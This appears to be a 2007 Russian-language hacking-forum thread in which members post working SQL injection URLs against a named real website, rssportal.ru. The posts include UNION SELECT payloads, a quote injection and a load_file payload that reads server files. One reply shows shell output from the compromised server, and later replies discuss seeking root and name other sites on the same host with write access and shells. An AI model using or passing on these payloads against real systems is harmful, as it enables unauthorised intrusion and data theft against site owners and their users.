ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Injection на rssportal.ru
  #1  
Старый 01.06.2007, 18:47
Аватар для Micr0b
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию Injection на rssportal.ru

Injection на rssportal.ru

Хотелось бы отметить ету инж., так как там есть сами посмотрите что
Хотя ето не новость

Вот ищо несколько injection на етом же сайте:

Код:
http://rssportal.ru/catalog.php?rss_id=-54161+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
Код:
http://rssportal.ru/catalog.php?cat_id=-1+UNION+SELECT+1,name,3,4,5,6,7,8+FROM+category/*
Код:
http://rssportal.ru/registration.php?uid=1&confirm=blablabla'
Вот и видео: http://video.antichat.ru/download_228.html

Последний раз редактировалось Micr0b; 14.06.2007 в 17:06..
 
Ответить с цитированием

  #2  
Старый 01.06.2007, 18:55
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Смотрел на ускоренном воспроизведении(: Видео не стоило снимать имхо. Инъекция стандартна. Могли простенькую шифровку пассов поставить..
PS Вот если бы ты шелл залил, был бы хоть какой то материал.
__________________
..
 
Ответить с цитированием

  #3  
Старый 02.06.2007, 02:05
Аватар для wix
wix
Новичок
Регистрация: 23.05.2007
Сообщений: 19
Провел на форуме:
237993

Репутация: 7
По умолчанию

Код:
http://rssportal.ru/catalog.php?cat_id=-57+UNION+SELECT+1,load_file(%22/home/rss/rssagg.wrk.infostars.ru/htdocs/admin.php%22),3,4,5,6,7,8+FROM+user+WHERE+id=2/*
даж файлы читать мона)
 
Ответить с цитированием

  #4  
Старый 02.06.2007, 09:24
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

молодец микроб
 
Ответить с цитированием

  #5  
Старый 02.06.2007, 14:23
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
Вот если бы ты шелл залил, был бы хоть какой то материал
.

Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)

Последний раз редактировалось Spyder; 02.06.2007 в 14:31..
 
Ответить с цитированием

  #6  
Старый 02.06.2007, 14:35
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от Spyder  
.

Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux
uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)
Вот если бы кто нибудь рут взял
__________________
..
 
Ответить с цитированием

  #7  
Старый 02.06.2007, 14:41
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
 
Ответить с цитированием

  #8  
Старый 25.06.2007, 02:13
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Цитата:
Сообщение от Spyder  
на серваке кстати хостится press.webfile.ru с записью в корень сайта =)
На webfile.ru запись в корень сайта есть и скуль...шелл тоже там есть
 
Ответить с цитированием

  #9  
Старый 25.06.2007, 09:48
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Да и админка там есть )))
 
Ответить с цитированием

  #10  
Старый 25.06.2007, 09:54
Аватар для kot777
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277

Репутация: 1635


Отправить сообщение для kot777 с помощью ICQ
По умолчанию

Да и приват на ачате никогда не палиться половиной ачата
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
Hacking Databases-SQL Injection Attacks Dracula4ever Комментарии к видео 4 01.02.2007 16:44
CRLF injection Electro Уязвимости 6 22.08.2006 14:28
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ